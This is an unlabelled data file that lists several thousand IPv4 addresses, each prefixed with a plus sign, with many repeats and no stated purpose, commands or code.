+111.230.206.141 +39.98.223.177 +218.5.2.251 +111.230.206.141 +113.195.156.51 +111.230.206.141 +42.194.230.238 +103.36.90.49 +218.107.223.156 +42.194.230.238 +61.144.241.6 +111.230.206.141 +42.194.230.238 +182.92.65.20 +112.112.14.234 +111.230.206.141 +113.87.160.13 +14.29.84.77 +112.81.63.237 +42.194.230.238 +115.219.235.14 +111.164.184.165 +111.230.206.141 +122.245.86.184 +111.230.206.141 +218.22.185.86 +111.230.206.141 +121.61.118.56 +111.230.206.141 +111.230.206.141 +60.189.112.101 +113.195.156.51 +222.240.225.147 +111.230.206.141 +42.194.230.238 +219.131.221.174 +119.191.10.33 +120.1.135.222 +111.230.206.141 +115.218.126.201 +103.36.90.58 +111.230.206.141 +111.230.206.141 +42.194.230.238 +117.158.118.21 +42.194.230.238 +115.219.4.66 +42.194.230.238 +42.194.230.238 +111.230.206.141 +113.87.91.249 +124.172.188.14 +113.88.124.200 +219.138.151.22 +220.179.118.150 +122.137.242.96 +116.7.75.136 +122.245.84.3 +42.194.230.238 +125.89.34.153 +183.158.26.209 +42.194.230.238 +111.230.206.141 +111.230.206.141 +42.194.230.238 +221.207.27.199 +117.40.91.158 +112.26.163.142 +42.194.230.238 +42.194.230.238 +47.107.150.38 +122.112.251.170 +42.194.230.238 +125.107.174.116 +111.230.206.141 +182.61.6.118 +42.194.230.238 +110.191.211.61 +111.26.164.22 +113.87.162.18 +111.230.206.141 +122.112.234.128 +42.194.230.238 +42.194.230.238 +42.194.230.238 +116.10.125.143 +111.230.206.141 +42.194.230.238 +183.236.155.59 +180.141.91.161 +183.15.177.21 +115.203.18.41 +111.230.206.141 +122.224.174.178 +42.123.124.195 +210.28.227.186 +119.129.115.212 +42.194.230.238 +42.194.230.238 +14.104.99.153 +42.194.230.238 +183.143.74.173 +111.230.206.141 +113.8.5.31 +42.194.230.238 +106.13.79.31 +42.194.230.238 +180.142.178.80 +114.223.227.55 +42.194.230.238 +111.230.206.141 +59.50.85.212 +120.25.87.22 +210.6.161.10 +218.22.185.86 +111.230.206.141 +222.179.155.7 +111.230.206.141 +106.38.169.52 +42.194.230.238 +111.230.206.141 +42.194.230.238 +125.107.145.94 +111.230.206.141 +111.230.206.141 +111.230.206.141 +113.85.101.166 +120.78.13.43 +222.82.152.24 +180.141.91.161 +42.194.230.238 +111.230.206.141 +211.141.224.169 +120.78.214.14 +112.115.17.229 +60.162.11.151 +122.243.151.192 +14.146.72.106 +111.230.206.141 +42.194.230.238 +202.102.107.14 +111.230.206.141 +123.159.112.29 +111.230.206.141 +119.97.139.81 +42.194.230.238 +122.112.224.149 +101.16.142.29 +101.37.66.68 +111.230.206.141 +119.23.145.111 +218.74.6.238 +60.173.253.89 +60.173.82.68 +111.230.206.141 +116.128.228.13 +123.155.72.134 +42.194.230.238 +42.194.230.238 +116.128.228.13 +14.104.101.10 +14.155.223.190 +111.230.206.141 +111.230.206.141 +42.194.230.238 +125.89.35.2 +113.116.159.176 +111.230.206.141 +111.26.164.22 +103.36.90.50 +180.141.91.161 +219.142.111.118 +120.77.106.25 +115.202.43.168 +111.230.206.141 +123.155.72.134 +111.230.206.141 +111.230.206.141 +220.166.240.33 +119.129.118.182 +111.230.206.141 +113.87.163.7 +60.189.102.80 +183.138.184.144 +222.246.135.202 +111.230.206.141 +103.36.90.58 +110.251.239.103 +115.219.239.168 +42.194.230.238 +125.118.17.134 +111.26.164.22 +116.7.74.194 +111.26.164.22 +42.194.230.238 +118.112.91.253 +183.138.184.159 +58.56.187.82 +114.55.3.7 +111.230.206.141 +42.194.230.238 +42.194.230.238 +113.116.135.237 +113.87.161.19 +42.194.230.238 +183.234.132.70 +183.157.3.62 +111.26.164.22 +42.194.230.238 +112.115.17.238 +111.230.206.141 +171.217.83.223 +110.87.24.50 +115.207.238.135 +111.230.206.141 +47.105.75.196 +59.38.32.35 +42.194.230.238 +42.194.230.238 +117.29.167.138 +183.136.100.91 +42.194.230.238 +112.31.26.65 +117.157.67.161 +222.246.135.203 +113.204.166.76 +180.140.75.24 +42.194.230.238 +120.204.195.112 +14.104.101.178 +119.18.224.86 +61.144.225.17 +183.138.148.253 +111.230.206.141 +119.18.224.93 +123.124.150.194 +60.162.12.176 +171.214.206.15 +111.230.206.141 +60.162.23.233 +113.116.88.111 +113.69.137.71 +202.203.16.18 +119.18.224.84 +113.85.103.173 +203.69.238.225 +122.144.178.202 +42.194.230.238 +42.194.230.238 +61.145.111.6 +61.145.111.29 +42.194.230.238 +59.50.76.152 +120.224.0.48 +42.194.230.238 +61.166.162.112 +180.112.227.230 +113.87.90.57 +123.235.225.237 +119.52.63.106 +58.37.230.147 +112.64.187.68 +42.194.230.238 +103.73.66.210 +119.129.114.61 +111.230.206.141 +111.230.206.141 +111.230.206.141 +111.230.206.141 +42.194.230.238 +116.255.201.5 +42.194.230.238 +42.194.230.238 +42.194.230.238 +42.194.230.238 +211.103.134.27 +42.194.230.238 +111.230.206.141 +111.230.206.141 +112.26.6.73 +220.188.43.41 +60.162.166.137 +14.126.204.255 +183.158.61.25 +111.230.206.141 +111.230.206.141 +36.26.226.234 +42.194.230.238 +183.143.90.4 +183.15.178.102 +42.194.230.238 +202.101.216.23 +114.215.252.161 +111.230.206.141 +171.214.206.27 +125.120.252.168 +42.194.230.238 +60.162.10.37 +60.189.97.215 +111.230.206.141 +183.156.168.31 +42.194.230.238 +61.187.93.76 +222.178.189.181 +14.145.88.40 +121.37.206.104 +113.110.203.140 +42.194.230.238 +101.37.158.170 +42.194.230.238 +42.194.230.238 +120.35.103.240 +113.118.72.9 +116.7.75.80 +111.230.206.141 +115.197.127.82 +218.241.213.57 +58.37.230.147 +111.230.206.141 +183.14.82.103 +106.12.43.4 +222.87.19.14 +222.87.19.14 +116.7.72.78 +113.110.184.69 +175.99.134.73 +60.178.216.194 +122.228.19.76 +14.104.100.68 +111.230.206.141 +14.155.222.191 +121.224.119.106 +210.176.53.196 +121.37.206.104 +36.249.126.176 +123.159.113.17 +183.136.119.29 +14.126.204.185 +202.196.96.164 +202.196.96.164 +202.196.96.164 +125.122.9.65 +202.196.96.164 +202.196.96.164 +221.4.210.189 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +116.30.198.12 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +139.198.176.47 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +111.230.206.141 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +42.194.230.238 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +42.194.230.238 +202.196.96.164 +117.15.235.80 +202.196.96.164 +202.196.96.164 +221.209.35.203 +202.196.96.164 +202.196.96.164 +180.142.179.238 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +115.218.123.91 +116.233.204.208 +202.196.96.164 +202.196.96.164 +124.117.221.58 +202.196.96.164 +202.196.96.164 +202.196.96.164 +123.155.76.147 +123.207.161.58 +202.196.96.164 +60.162.163.48 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +218.90.190.106 +120.238.130.181 +202.196.96.164 +202.196.96.164 +124.119.17.206 +202.196.96.164 +202.196.96.164 +202.196.96.164 +111.230.206.141 +61.182.241.251 +202.196.96.164 +202.196.96.164 +42.194.230.238 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +120.35.101.123 +202.196.96.164 +202.196.96.164 +111.26.164.22 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +119.188.255.140 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +111.230.206.141 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +113.12.112.218 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +42.194.230.238 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +61.130.96.246 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +60.162.6.5 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +112.243.209.35 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +183.15.88.122 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +27.184.34.255 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +112.30.53.158 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +101.16.75.158 +202.196.96.164 +47.108.61.66 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +115.174.67.102 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +106.14.247.240 +202.196.96.164 +210.42.225.50 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +60.210.112.90 +202.196.96.164 +202.196.96.164 +202.196.96.164 +60.162.19.48 +202.196.96.164 +202.196.96.164 +202.196.96.164 +125.107.176.98 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +14.155.221.107 +202.196.96.164 +218.94.26.15 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +180.112.231.59 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +47.93.119.234 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +14.126.205.190 +202.196.96.164 +202.196.96.164 +202.196.96.164 +124.128.8.187 +202.196.96.164 +202.196.96.164 +123.159.54.55 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +36.24.87.95 +202.196.96.164 +202.196.96.164 +14.126.205.60 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +59.152.251.140 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +119.181.233.42 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +116.63.87.176 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +114.84.144.104 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +60.162.6.92 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +171.214.206.43 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +116.25.135.9 +202.196.96.164 +202.196.96.164 +122.243.149.111 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +60.6.218.182 +202.196.96.164 +202.196.96.164 +183.49.46.255 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +119.96.172.232 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +183.27.181.209 +202.196.96.164 +121.225.229.105 +222.85.144.89 +112.227.161.118 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +47.108.148.2 +202.196.96.164 +180.166.124.214 +115.174.67.118 +220.166.240.209 +202.196.96.164 +202.196.96.164 +202.196.96.164 +14.145.36.26 +202.196.96.164 +60.162.165.91 +122.245.157.79 +116.54.81.157 +113.116.126.49 +202.196.96.164 +202.196.96.164 +60.18.143.13 +202.196.96.164 +101.70.67.117 +202.196.96.164 +59.42.63.168 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +113.88.118.237 +183.149.246.48 +202.196.96.164 +202.196.96.164 +202.196.96.164 +121.227.0.142 +36.25.97.119 +202.196.96.164 +202.196.96.164 +202.196.96.164 +183.138.139.171 +222.82.157.110 +202.196.96.164 +218.0.175.28 +202.196.96.164 +221.196.48.119 +202.196.96.164 +114.84.144.104 +202.196.96.164 +202.196.96.164 +171.214.206.52 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +119.129.113.156 +116.7.75.187 +14.126.206.252 +202.196.96.164 +60.13.182.137 +115.174.67.108 +111.204.231.76 +210.242.49.248 +60.162.6.197 +202.196.96.164 +113.85.103.56 +14.145.36.84 +101.72.135.24 +111.164.177.227 +202.196.96.164 +202.196.96.164 +202.196.96.164 +202.196.96.164 +112.226.136.144 +59.32.215.7 +115.208.186.179 +202.196.96.164 +202.196.96.164 +14.104.102.90 +202.196.96.164 +61.183.153.118 +202.196.96.164 +202.196.96.164 +220.191.59.50 +120.209.157.73 +125.69.92.39 +112.30.184.208 +106.13.126.14 +60.189.120.37 +61.181.125.5 +103.36.90.54 +210.242.49.248 +47.103.144.5 +60.209.93.166 +180.212.166.88 +115.218.70.110 +114.89.77.208 +110.185.218.123 +122.227.53.253 +221.130.124.61 +115.203.25.37 +183.146.97.250 +218.94.104.207 +218.6.203.200 +218.6.203.197 +123.234.88.116 +60.190.176.78 +202.196.96.164 +202.196.96.164 +116.9.30.210 +124.78.253.7 +202.196.96.164 +182.245.143.217 +60.190.176.77 +122.245.86.202 +61.57.227.160 +222.186.32.250 +157.122.144.26 +202.196.96.164 +14.104.99.249 +202.196.96.164 +202.196.96.164 +180.140.74.245 +58.210.0.41 +125.69.92.41 +219.144.186.58 +61.158.168.173 +202.196.96.164 +220.128.242.127 +117.40.9.25 +202.196.96.164 +202.196.96.164 +202.196.96.164 +210.242.49.248 +116.7.73.151 +119.129.128.203 +202.196.96.164 +202.196.96.164 +113.116.2.44 +171.214.206.203 +113.102.130.71 +180.109.145.79 +14.155.223.212 +202.196.96.164 +183.49.44.228 +218.23.6.51 +202.196.96.164 +42.247.3.9 +202.196.96.164 +220.130.199.140 +202.196.96.164 +202.196.96.164 +202.196.96.164 +210.28.231.180 +202.196.96.164 +47.91.235.169 +114.251.49.141 +220.135.117.3 +49.235.50.54 +60.189.115.171 +61.141.138.120 +223.93.140.182 +61.190.27.61 +202.196.96.164 +59.46.166.45 +210.242.49.248 +202.196.96.164 +223.93.140.181 +115.218.67.207 +223.93.140.180 +223.93.140.178 +223.93.140.179 +202.196.96.164 +218.242.71.73 +112.94.5.91 +218.241.213.60 +58.18.37.154 +210.242.49.248 +202.196.96.164 +202.196.96.164 +202.196.96.164 +111.207.179.11 +119.190.38.2 +202.196.96.164 +202.196.96.164 +101.83.124.163 +61.129.181.125 +113.88.140.104 +202.196.96.164 +202.196.96.164 +210.29.183.47 +60.248.133.235 +59.42.60.193 +219.243.117.185 +183.146.98.30 +36.25.166.247 +103.73.66.210 +202.196.96.164 +101.229.74.199 +202.196.96.164 +220.166.243.92 +202.196.96.164 +119.254.65.39 +119.254.65.46 +60.247.32.29 +47.102.218.85 +202.196.96.164 +119.254.65.53 +202.196.96.164 +113.88.140.74 +202.196.96.164 +125.125.65.150 +202.196.96.164 +211.139.119.150 +202.196.96.164 +101.65.83.42 +39.75.189.28 +124.90.34.135 +202.196.96.164 +202.100.78.130 +119.146.190.66 +103.235.227.129 +14.146.224.121 +202.196.96.164 +218.32.238.246 +119.254.65.54 +119.254.65.50 +119.254.65.40 +119.254.65.51 +119.254.65.38 +119.254.65.52 +222.75.167.185 +183.27.180.169 +202.196.96.164 +221.220.148.139 +202.196.96.164 +116.22.199.168 +202.196.96.164 +119.188.254.200 +119.188.255.60 +119.188.254.160 +119.188.254.140 +119.188.254.150 +119.188.254.190 +119.188.255.120 +119.188.254.20 +220.128.239.14 +119.188.255.100 +119.188.255.210 +119.188.255.70 +119.188.255.180 +119.188.255.200 +119.188.255.170 +119.188.255.250 +119.188.255.180 +119.188.255.170 +116.7.73.126 +47.111.243.7 +220.184.35.133 +101.65.80.17 +222.79.254.29 +202.196.96.164 +119.188.255.220 +119.188.255.140 +119.188.255.150 +119.188.255.110 +119.188.255.160 +119.188.255.120 +119.188.255.230 +119.188.255.80 +119.188.255.130 +119.188.255.190 +119.188.255.90 +119.188.254.190 +119.188.254.220 +119.188.254.180 +119.188.254.170 +119.188.254.150 +119.188.254.160 +119.188.254.210 +119.188.254.250 +202.196.96.164 +119.188.254.230 +119.188.254.240 +119.188.254.220 +221.239.149.134 +119.188.254.140 +119.188.255.110 +119.188.255.100 +119.188.255.90 +125.107.152.213 +220.191.63.37 +218.22.191.82 +119.188.255.80 +111.164.177.133 +211.143.18.139 +106.38.36.91 +49.235.120.206 +119.188.254.250 +119.188.254.210 +119.188.254.170 +119.188.254.180 +171.88.103.249 +119.188.255.240 +119.188.255.70 +119.188.255.60 +119.188.254.240 +119.188.254.230 +119.188.254.200 +125.113.182.209 +116.7.73.49 +116.236.237.234 +113.85.103.111 +218.29.107.99 +61.141.138.108 +153.99.240.213 +125.125.36.5 +180.212.167.61 +202.196.96.164 +183.49.45.9 +114.88.157.247 +171.214.206.77 +202.196.96.164 +202.196.96.164 +120.197.60.214 +120.221.95.43 +221.209.38.104 +124.16.134.55 +60.162.165.137 +221.239.149.131 +202.196.96.164 +222.178.41.222 +81.70.13.163 +183.158.229.208 +202.101.235.103 +183.138.146.112 +202.119.81.192 +115.219.74.225 +110.189.91.194 +218.58.50.8 +221.213.162.248 +202.196.96.164 +202.105.183.147 +58.56.156.131 +14.145.90.6 +220.174.161.172 +47.100.13.144 +202.196.96.164 +222.75.145.186 +221.226.101.250 +58.19.210.49 +61.141.64.48 +202.196.96.164 +220.163.114.46 +183.158.213.208 +36.25.126.217 +113.92.164.24 +202.196.96.164 +117.62.165.100 +60.189.121.250 +117.50.49.119 +116.243.86.220 +59.42.229.234 +116.232.104.194 +59.42.230.228 +202.196.96.164 +183.27.181.83 +222.187.132.3 +14.21.70.253 +58.16.249.79 +210.42.160.57 +183.129.189.109 +101.16.242.60 +121.40.61.57 +113.116.44.134 +116.7.74.59 +60.162.11.38 +202.196.96.164 +124.162.128.2 +14.155.223.142 +113.88.135.119 +211.141.213.168 +218.23.170.96 +111.205.158.11 +115.224.79.205 +116.24.190.193 +114.255.239.175 +202.127.26.210 +222.80.142.106 +221.209.40.250 +113.102.130.55 +183.149.240.200 +113.119.8.108 +114.84.24.69 +113.116.127.6 +153.99.240.213 +112.25.219.186 +218.204.17.245 +202.196.96.164 +118.202.207.26 +202.196.96.164 +222.186.119.241 +58.17.217.20 +202.196.96.164 +219.141.248.219 +218.62.11.26 +210.42.160.57 +202.196.96.164 +202.196.96.164 +60.162.160.56 +171.214.206.18 +202.196.96.164 +221.213.162.248 +202.196.96.164 +218.23.35.35 +116.243.81.145 +202.196.96.164 +122.227.14.214 +183.146.103.115 +202.196.96.164 +202.196.96.164 +183.234.241.43 +120.195.132.87 +180.142.178.111 +223.221.36.18 +220.191.181.162 +116.1.144.144 +115.224.77.253 +60.162.11.91 +58.16.244.42 +183.224.86.201 +202.196.96.164 +210.44.195.140 +58.210.16.34 +113.102.147.4 +221.209.38.145 +202.196.96.164 +115.216.132.204 +183.14.76.77 +212.129.141.208 +220.166.243.190 +120.35.101.30 +122.228.177.86 +202.196.96.164 +112.255.78.68 +106.12.42.160 +61.160.136.88 +188.131.156.139 +220.194.186.110 +39.77.20.56 +113.102.131.229 +112.27.251.13 +202.196.96.164 +222.80.142.106 +61.183.215.2 +60.189.98.202 +49.75.25.51 +112.112.41.224 +113.91.250.4 +120.119.77.81 +219.146.1.145 +183.143.29.4 +218.15.144.13 +117.141.74.146 +122.245.82.243 +14.104.102.23 +183.149.102.40 +218.0.174.137 +47.98.17.253 +180.109.147.93 +202.196.96.164 +111.198.128.143 +183.194.240.37 +218.80.250.75 +122.228.177.86 +119.254.161.139 +117.158.243.78 +47.95.193.56 +112.244.104.62 +202.196.96.164 +111.230.130.219 +123.206.80.9 +123.159.11.49 +221.226.115.8 +61.168.22.102 +58.16.244.42 +61.185.7.147 +113.110.200.148 +113.88.248.230 +60.177.6.0 +201.157.59.232 +45.236.240.90 +189.90.58.210 +80.255.65.99 +94.130.193.253 +94.130.193.251 +94.130.193.255 +45.236.240.90 +91.121.37.169 +212.210.177.32 +146.12.194.69 +189.90.58.213 +18.229.157.194 +199.38.185.2 +94.130.253.227 +94.130.253.226 +94.130.253.224 +94.130.253.225 +94.130.253.230 +80.255.65.99 +177.7.11.69 +209.182.164.41 +167.216.134.134 +212.68.161.242 +117.252.85.142 +45.236.240.90 +223.62.231.179 +176.109.167.116 +201.217.129.178 +64.71.189.210 +183.88.214.182 +176.109.167.116 +54.207.94.154 +146.12.193.132 +45.236.240.90 +212.211.173.204 +179.104.164.178 +186.224.231.93 +81.25.210.33 +52.201.6.2 +189.17.53.135 +88.249.165.66 +45.236.240.90 +194.48.244.102 +34.194.52.156 +45.236.240.90 +52.8.40.167 +80.190.65.0 +183.88.214.182 +54.190.76.84 +103.136.114.132 +52.37.47.139 +201.20.93.66 +119.17.209.227 +179.152.32.64 +192.101.9.130 +43.251.18.5 +45.236.240.90 +52.23.96.223 +93.47.183.203 +192.101.9.130 +162.252.237.52 +45.236.240.90 +45.236.240.90 +52.25.251.44 +213.144.25.72 +179.179.134.203 +67.109.224.164 +183.88.214.182 +177.180.6.214 +187.94.99.166 +213.81.160.18 +52.166.52.114 +202.52.15.82 +89.44.226.73 +85.9.23.78 +187.141.226.46 +200.253.156.10 +45.236.240.90 +187.86.212.131 +186.214.176.175 +199.127.122.133 +52.11.236.246 +179.99.212.82 +35.169.161.98 +183.88.214.182 +159.146.58.195 +189.58.107.122 +193.230.241.4 +45.236.240.90 +52.87.71.151 +202.29.15.27 +217.5.211.237 +50.112.186.57 +200.146.119.161 +45.236.240.90 +195.101.103.115 +3.215.183.132 +52.87.71.142 +183.88.214.182 +93.57.25.85 +186.206.226.32 +189.201.249.3 +200.75.18.27 +204.13.32.57 +187.189.235.100 +152.78.118.12 +146.148.33.251 +88.119.154.115 +52.178.8.64 +193.233.10.21 +50.30.96.132 +194.176.109.157 +52.3.22.234 +200.179.23.37 +45.189.119.97 +183.88.214.182 +170.254.234.24 +192.101.9.131 +50.30.96.132 +189.59.17.182 +186.137.205.125 +183.88.214.182 +45.236.240.90 +190.63.175.169 +181.60.245.161 +31.216.41.59 +187.86.212.134 +199.66.220.186 +168.121.97.54 +113.161.116.44 +201.217.138.134 +183.88.214.182 +185.54.185.171 +45.236.240.90 +119.2.118.103 +191.253.107.8 +40.121.147.252 +200.55.74.19 +116.203.66.219 +203.121.77.243 +210.19.20.13 +13.248.167.3 +191.26.70.61 +186.3.19.85 +20.88.105.56 +189.58.151.206 +180.232.98.94 +34.213.26.245 +189.210.155.139 +189.210.155.140 +81.250.215.95 +189.210.155.138 +87.110.211.128 +80.82.213.104 +58.71.194.74 +43.242.101.76 +195.101.103.116 +81.215.63.123 +50.30.96.150 +109.70.138.242 +103.91.67.146 +68.67.124.4 +54.85.134.71 +179.178.242.124 +71.19.200.226 +54.211.97.97 +23.135.64.23 +153.127.12.60 +194.176.109.149 +193.226.144.175 +193.226.144.190 +162.254.130.18 +23.111.106.183 +5.35.254.187 +138.36.98.38 +84.204.165.182 +78.186.179.26 +186.249.10.118 +74.51.209.230 +45.236.240.90 +200.187.60.101 +54.169.146.246 +41.96.124.187 +200.125.34.122 +171.22.25.127 +186.208.221.112 +138.201.156.202 +190.144.244.55 +162.222.31.214 +63.249.54.18 +50.16.141.218 +201.217.141.130 +104.210.32.74 +34.206.203.82 +193.30.141.211 +162.223.141.216 +167.71.210.3 +177.43.210.178 +193.226.144.172 +200.128.85.177 +54.253.148.86 +162.223.141.202 +50.224.50.115 +190.0.133.231 +117.212.191.17 +34.132.66.81 +191.31.160.192 +34.226.71.76 +200.179.75.143 +187.63.222.132 +207.35.252.13 +117.213.34.189 +187.73.233.2 +152.70.210.160 +79.231.236.134 +179.27.126.12 +63.251.188.85 +20.185.61.202 +63.251.188.86 +181.213.55.209 +190.128.222.170 +190.210.182.125 +198.12.17.23 +177.4.172.84 +54.88.133.92 +202.183.208.107 +64.56.216.2 +172.105.207.84 +34.239.72.61 +64.7.163.3 +85.13.239.210 +3.7.229.229 +199.127.122.154 +13.228.55.159 +196.92.11.136 +180.232.98.93 +13.234.45.168 +14.186.112.209 +45.236.240.90 +187.217.220.34 +199.48.170.11 +31.216.41.63 +117.194.134.108 +117.217.213.244 +189.45.207.129 +170.80.70.20 +34.230.64.167 +52.76.22.45 +59.88.187.195 +117.213.37.117 +67.109.224.164 +58.69.236.9 +133.242.5.193 +194.156.152.136 +177.185.141.121 +70.63.186.98 +178.255.138.242 +12.167.48.50 +34.194.52.156 +72.166.251.6 +177.135.248.94 +179.107.233.229 +190.131.197.76 +34.198.15.138 +69.162.109.182 +201.221.0.231 +150.162.1.22 +59.92.176.180 +24.41.66.189 +177.43.44.146 +77.89.0.202 +194.176.109.168 +67.211.121.140 +82.69.228.173 +177.50.160.76 +3.0.25.5 +64.139.127.67 +177.69.142.51 +200.233.156.143 +120.72.110.133 +41.97.56.129 +140.238.176.2 +103.10.231.25 +212.122.92.130 +200.143.34.181 +189.100.193.80 +117.120.25.21 +52.19.103.161 +179.27.152.242 +64.18.242.2 +193.226.144.165 +185.160.48.228 +180.232.98.91 +43.242.101.4 +34.72.13.8 +67.130.117.149 +185.160.48.227 +88.99.2.45 +187.181.141.219 +199.71.210.180 +85.13.244.246 +189.57.191.82 +117.200.77.179 +13.229.109.147 +138.36.98.35 +212.237.47.248 +194.176.109.145 +181.65.214.107 +117.222.143.47 +201.93.159.169 +109.70.139.71 +199.38.185.2 +199.38.185.3 +117.212.176.155 +59.88.188.141 +201.217.136.114 +59.92.189.90 +138.36.98.34 +213.81.151.11 +117.221.131.172 +31.134.62.103 +104.209.245.203 +61.2.65.108 +176.94.183.213 +201.221.26.184 +179.108.175.43 +200.124.219.91 +181.39.23.14 +34.234.246.253 +104.243.1.4 +66.182.128.199 +117.217.213.182 +117.212.190.133 +64.74.135.109 +31.216.41.55 +81.198.161.8 +187.21.213.149 +200.135.190.64 +177.159.155.60 